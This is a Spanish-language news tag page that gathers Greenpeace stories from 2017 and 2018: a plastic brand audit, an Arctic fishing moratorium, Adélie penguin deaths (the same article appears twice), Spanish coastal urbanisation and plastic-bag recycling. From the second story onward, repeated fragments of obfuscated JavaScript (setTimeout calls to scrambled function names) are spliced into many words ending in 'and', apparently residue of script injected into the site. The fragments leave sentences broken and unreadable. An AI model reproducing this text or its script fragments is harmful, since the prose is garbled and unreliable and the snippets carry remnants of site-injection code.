Etiquetas: Greenpeace


Las 10 empresas que más generan plástico a nivel mundial, según Greenpeace

10 octubre, 2018

México. Las multinacionales Coca-Cola, Pepsi y Nestlé son las firmas que más contribuyen a la contaminación de los océanos con basura plástica, indicó un reporte de Greenpeace.

Como parte de una iniciativa Break Free From Plastic (Librémonos del Plástico), Greenpeace dijo que organizó 239 limpiezas de plástico en 42 países [entre ellos México, Chile, Brasil, Vietnam, España], que resultaron en un análisis de 187 mil piezas de residuos. El objetivo era obtener una fotografía de cómo contribuyen las grandes corporaciones al problema de la contaminación.

Coca-Cola, el mayor fabricante mundial de refrescos, es el que más basura produce, según Greenpeace. Se encontraron desperdicios plásticos de esta firma en 40 de los 42 países analizados.

“Esta auditoría de marcas ofrece una prueba innegable del papel que juegan las corporaciones en la perpetuación de la crisis global de polución plástica”, indicó Von Hernández, coordinador global de Break Free From Plastic.

En total, el tipo de plástico más común hallado fue el poliestireno, usado en los empaques y en la fabricación de vasos de café, seguido por el PET, utilizado en botellas y contenedores.

Las tres compañías más contaminadoras han realizado promesas sobre sus embalajes para 2025. Coca-Cola asegura que todos sus envoltorios serán reciclables; Nestlé prometió que serán reciclables o reutilizables, mientras que Pepsi indicó que serán reciclables, compostables o biodegradables.

Detrás de estas tres, en el ranking de empresas más contaminantes le siguen: Danone, Mondelez, Procter & Gamble, Unilever, Perfetti van Melle, Mars Incorporated y Colgate-Palmolive, todas multinacionales relacionadas con la alimentación, la higiene y los productos del hogar.

“Estas compañías tienen que elegir, pueden ser parte del problema o de la solución. Si se empeñan en seguir utilizando para sus productos envolturas innecesarias de plástico, seguirán alentando su fabricación y por tanto la contaminación”, apuntó Hernández.

De lo recolectado, alrededor de 100 mil piezas eran de materiales que son imposible o muy difíciles de reciclar, como el poliestireno, el PVC (cloruro de polivinilo), PET (tereftalato de polietileno) -usado sobre todo en botellas- o el filme de plástico de un sólo uso.

Fuente: AlMomentoMx


Celebra Greenpeace acuerdo histórico para proteger el Ártico

2 diciembre, 2017

Madrid. Greenpeace ha celebrado el “acuerdo histórico” para proteger el Ártico de la pesca industrial en un área de 2.8 millones de kilómetros cuadrados y se espera dure 16 años mientras se llevan a cabo investigaciones sobre el ecosistema marino existente.

El convenio ha sido firmado por Estados Unidos, Canadá, Noruega, Rusia, Dinamarca, Islandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andia, Japón, Corea del Sur, China y la Unión Europea, así como la confirmación de la protección en la Antártida de 1.5 millones de kilómetros cuadrado en el mar de Ross.

El acuerdo, adoptado la pasada madrugada en Washington, establece la moratoria de la pesca comercial durante los próximos 16 años en las aguas internacionales del Alto Ártico que cubre una superficie de 2.8 millones de kilómetros cuadrados, igual al tamaño del mar Mediterráneo.

La ONG califica de “victoria histórica” para la protección del Ártico y agradece el apoyo a la campaña Salva el Ártico de 8.5 millones de personas en todo el mundo.

“Esta área única en la cima del mundo estará a salvo de las pesquerías más destructivas, por lo que aplaudimos a los países que están detrás de este acuerdo”, manifestó la responsable de la campaña Salva el Ártico de Greenpeace, Pilar Marcos.

“Esperamos que durante los próximos 16 años trabajen para reafirmar su protección permanente, no solo de la pesca comercial sino también del resto de industrias extractivas”, comentó.

El acuerdo es legalmente vinculante y se extenderá de forma automática cada cinco años siempre que ningún país presente objeciones o se conozcan nuevos datos científicos.

El océano Ártico central ha experimentado el incremento de la presión por parte de la industria pesquera, ya que su escudo protector de hielo marino se está derritiendo debido al cambio climático.

El 40 por ciento de esta área históricamente cubierta de hielo ha experimentado veranos sin hielo en los últimos años.

La organización celebró también el anuncio sobre la protección en la Antártida para el mar de Ross, donde se confirma un área marina protegida que abarca 1.5 millones de kilómetros cuadrados.

“Este es uno de los raros momentos en que un grupo de gobiernos resolvió un problema antes de que sucediera”, afirmó David Balton, embajador de Estados Unidos para los Océanos y la Pesca.

“En el futuro, si las poblaciones de peces son lo suficientemente abundantes como para apoyar una pesquería comercial allí, serán parte del sistema de gestión y, presumiblemente, sus buques tendrán la oportunidad de pescar esas poblaciones”.

Fuente: Notimex


Reporta Greenpeace muerte masiva de pingüinos en la Antártida

14 octubre, 2017

Santiago. La organización ecologista Greenpeace reportó hoy aquí una masiva muerte de pingüinos en la Antártida, fenómeno que se produce por segunda vez en los últimos 50 años.

La entidad señaló en un comunicado que “en un evento de crianza catastrófico, de una colonia de 40 mil pingüinos Adelaida apenas dos crías lograron sobrevivir este año. Es la segunda devastación de este tipo en los últimos 50 años”.

Detalló que el descubrimiento fue realizado por científicos franceses en la isla Petrels, donde comprobaron la existencia de “miles de crías muertas y no nacidas en una zona conocida como ‘La tierra de Adelaida’”.

La coordinadora de Océanos de Greenpeace, Estefanía González, aseveró que “es la segunda vez que se comprueba una mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad de este tipo en los últimos 50 años y por eso es que diversas organizaciones medioambientales estamos reclamado una acción urgente para declarar la zona como un área marina protegida”.

Este fenómeno, añadió, correspondería a “evidentes impactos que está causandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o el cambio climático y el accionar del hombre, especialmente a través de la pesca y el aumento del turismo”.

Agregó que “desde Greenpeace estamos llamandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o para que se extienda una zona de protección marina en la zona. Por eso la relevancia de la próxima reunión de la Comisión para la Conservación de los Recursos Vivos Marinos Antárticos que sesiona en Australia la próxima semana”.

La anterior mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad se produjo en 2013 debido a la existencia récord de hielo, a lo que se sumó un episodio de lluvia sin precedentes.

“La presencia inusual de hielo significó entonces una traba adicional para los pingüinos, los que debieron sumar cerca de 100 kilómetros de recorrido para buscar alimentos para sus crías”, se indicó en el comunicado de Greenpeace.

Precisó que “la mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad de este año se debe a las mismas razones del 2013, especialmente ligada a la gran cantidad de hielo extra que han debido sortear los pingüinos en búsqueda de alimento. Ese hielo extra proviene de una gran rotura que se produjo en 2010, cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o se desprendió y quedó a la deriva un iceberg” gigantesco.

Fuente: AlMomento.Mx


Greenpeace reporta muerte masiva de pingüinos en la Antartida

13 octubre, 2017

Santiago. La organización ecologista Greenpeace reportó hoy aquí una masiva muerte de pingüinos en la Antártida, fenómeno que se produce por segunda vez en los últimos 50 años.

La entidad señaló en un comunicado que “en un evento de crianza catastrófico, de una colonia de 40 mil pingüinos Adelaida apenas dos crías lograron sobrevivir este año. Es la segunda devastación de este tipo en los últimos 50 años”.

Detalló que el descubrimiento fue realizado por científicos franceses en la isla Petrels, donde comprobaron la existencia de “miles de crías muertas y no nacidas en una zona conocida como ‘La tierra de Adelaida’”.

La coordinadora de Océanos de Greenpeace, Estefanía González, aseveró que “es la segunda vez que se comprueba una mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad de este tipo en los últimos 50 años y por eso es que diversas organizaciones medioambientales estamos reclamado una acción urgente para declarar la zona como un área marina protegida”.

Este fenómeno, añadió, correspondería a “evidentes impactos que está causandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o el cambio climático y el accionar del hombre, especialmente a través de la pesca y el aumento del turismo”.

Agregó que “desde Greenpeace estamos llamandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o para que se extienda una zona de protección marina en la zona. Por eso la relevancia de la próxima reunión de la Comisión para la Conservación de los Recursos Vivos Marinos Antárticos que sesiona en Australia la próxima semana”.

La anterior mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad se produjo en 2013 debido a la existencia récord de hielo, a lo que se sumó un episodio de lluvia sin precedentes.

“La presencia inusual de hielo significó entonces una traba adicional para los pingüinos, los que debieron sumar cerca de 100 kilómetros de recorrido para buscar alimentos para sus crías”, se indicó en el comunicado de Greenpeace.

Precisó que “la mortandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ad de este año se debe a las mismas razones del 2013, especialmente ligada a la gran cantidad de hielo extra que han debido sortear los pingüinos en búsqueda de alimento. Ese hielo extra proviene de una gran rotura que se produjo en 2010, cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o se desprendió y quedó a la deriva un iceberg” gigantesco.

Fuente: Notimex


Alerta Greenpeace por urbanización en costa española; creció 57%

10 julio, 2017

 

Madrid. La organización ecologista Greenpeace alertó hoy que la urbanización en la costa española creció un 57 por ciento en los últimos 24 años y que solo un 27 por ciento de la costa española está protegida.

El informe reveló que casi la mitad de la costa pública del Mediterráneo está destruida y las provincias con más litoral urbanizado son Barcelona, Alicante y Málaga.

Precisó que en 24 años, la urbanización en la costa creció un 148 por ciento en Castellón, seguida por Granada con un 146 por ciento de crecimiento, Valencia con un 118 por ciento y Cádiz con un 111 por ciento.

Ademas, hay 52 tramos costeros con alto peligro de urbanización futura.

Greenpeace y el Observatorio de la Sostenibilidad presentaron este lunes en rueda de prensa en Málaga, sur español, este informe sobre el estado actual de la protección y desprotección en la costa española, así como las tendencias que se observan en las zonas libres de ladrillo.

El informe fue presentado a bordo del barco MY Esperanza de Greenpeace y analiza las zonas de mayor valor ambiental que ya están protegidas, las que están urbanizadas y en las que, por tanto, sería difícil actuar y, por último, aquellas cuya conservación es relevante para el futuro y, lamentablemente, muy codiciadas por el urbanismo.

Pilar Marcos, responsable en Greenpeace de la campaña Biodiversidad, señaló que “los datos indican que no ha desaparecido el ansia por seguir ocupandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o los primeros kilómetros de costa y los alrededores de los parques naturales”.

“La flexibilización de normativas como la nueva Ley de Costas, la Ley de Impacto Ambiental, la futura Ley del Suelo de Canarias y la indiferencia ante sentencias judiciales como en algunos hoteles parecen ser los catalizadores de una segunda edad de oro para el ladrillo”, sostuvo.

Uno de los principales riesgos que se identifican es el aumento exponencial de la construcción de urbanizaciones e infraestructuras en la costa junto a los efectos derivados del cambio climático y la mayor exposición a inundaciones o a torrentes.

Este es el caso de municipios como Isla Cristina (Huelva), Pedregalejo (Málaga), Empuriabrava (Girona) o Marina de Port d’Aro (Girona) que han quedado amnistiados y fuera de protección gracias a la nueva Ley de Costas y tienen, por ello, un especial riesgo de inundación.

Por esto, la conservación del estado natural de la franja de los primeros 500 metros es esencial, ya que actúa como barrera de protección, advirtió la organización ecologista.

Además, Greenpeace y el Observatorio de la Sostenibilidad analizaron las zonas que pueden sufrir en un futuro una alta presión urbanizadora, pues en la actualidad o no están protegidas o se encuentran cerca de zonas ya urbanizadas y bien comunicadas a través de carreteras.

Fuente: Notimex


Sólo el 7% de bolsas de plástico se recicla, alerta Greenpeace 

3 julio, 2017

Madrid. Casi 100 mil millones de bolsas de plásticos de un solo uso se utilizan cada año en Europa, según datos de la Comisión Europea, de las cuales unicamente se reciclan el siete por ciento y ocho mil millones terminan en el medio natural, advirtió Greenpeace.

En el Día internacional sin bolsas de plástico, la organización ecologista puntualizó que por persona se usa una media anual de 175 bolsas de plástico, aunque las cifras varían significativamente de un país a otro.

Expuso que la utilización media de una bolsa es de 15 minutos, pero pueden tardar cientos de años -en torno a 400- en degradarse, creandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o graves impactos medioambientales y por todo ello, Greenpeace pidió su prohibición.

“Hoy, queremos recordar que no basta cobrar las bolsas de plástico de un solo uso, deberían prohibirse, como han hecho otros países como Francia”, sostuvo Elvira Jiménez, responsable de la campaña de Plásticos de Greenpeace.

“El Ministerio de Medio Ambiente debe actuar y tomar las medidas necesarias para eliminar el plástico de un solo uso, incluido el envasado, que representa el 40 por ciento de la demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a de plástico en Europa”, anotó.

Destacó que hay que ser ambiciosos y reducir y eliminar su uso de forma progresiva.

De acuerdo a datos de Greenpeace, solo el siete por ciento de las bolsas se reciclan y muchas de ellas ni siquiera entran en el sistema de gestión de residuos, es decir, que no van a vertederos, se pierden en el entorno, contaminandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o el medio ambiente y los océanos.

Se estima que a nivel mundial mil 341 especies se han visto afectadas por el impacto de las bolsas de plásticos a través de la colonización de hábitats, ingestión, enmarañamiento, asfixia u otros, dañandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o gravemente o incluso matandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o a la vida marina.

De hecho, el 92 por ciento de los impactos estudiados y contabilizados entre basura marina y organismos marinos fueron con plástico.

En 2015, la Unión Europea adoptó la Directiva de bolsa de plástico, que requiere a los Estados Miembros que reduzcan el consumo de bolsas de plástico ligeras (inferiores a 50 micras).

Hay países, como Francia o Italia, que han prohibido su uso y en España se consumen una media de 144 bolsas por habitante anualmente que suponen unas seis mil 800 millones de bolsas en circulación de todo tipo de grosor cada año.

El gobierno español presentó a principios de 2017 el borrador de Real Decreto para la implementación de la Directiva de bolsas ligeras que debería estar ya en la legislación de este país desde noviembre de 2016.

Este borrador sigue pendiente de aprobación y carece además de la necesaria ambición ya que opta por las opciones menos restrictivas como el cobro de las bolsas en lugar de su prohibición y quedan fuera de la regulación las bolsas que se emplean para la compra a granel.

Greenpeace está en la actualidad realizandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o un tour de barco alrededor del Mediterráneo con el Rainbow Warrior bajo el lema “Menos plásticos, más Mediterráneo”, para denunciar la contaminación por plásticos de este mar y demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ar la eliminación de los plásticos de un solo uso, incluyendo bolsas de plástico.

Fuente: Notimex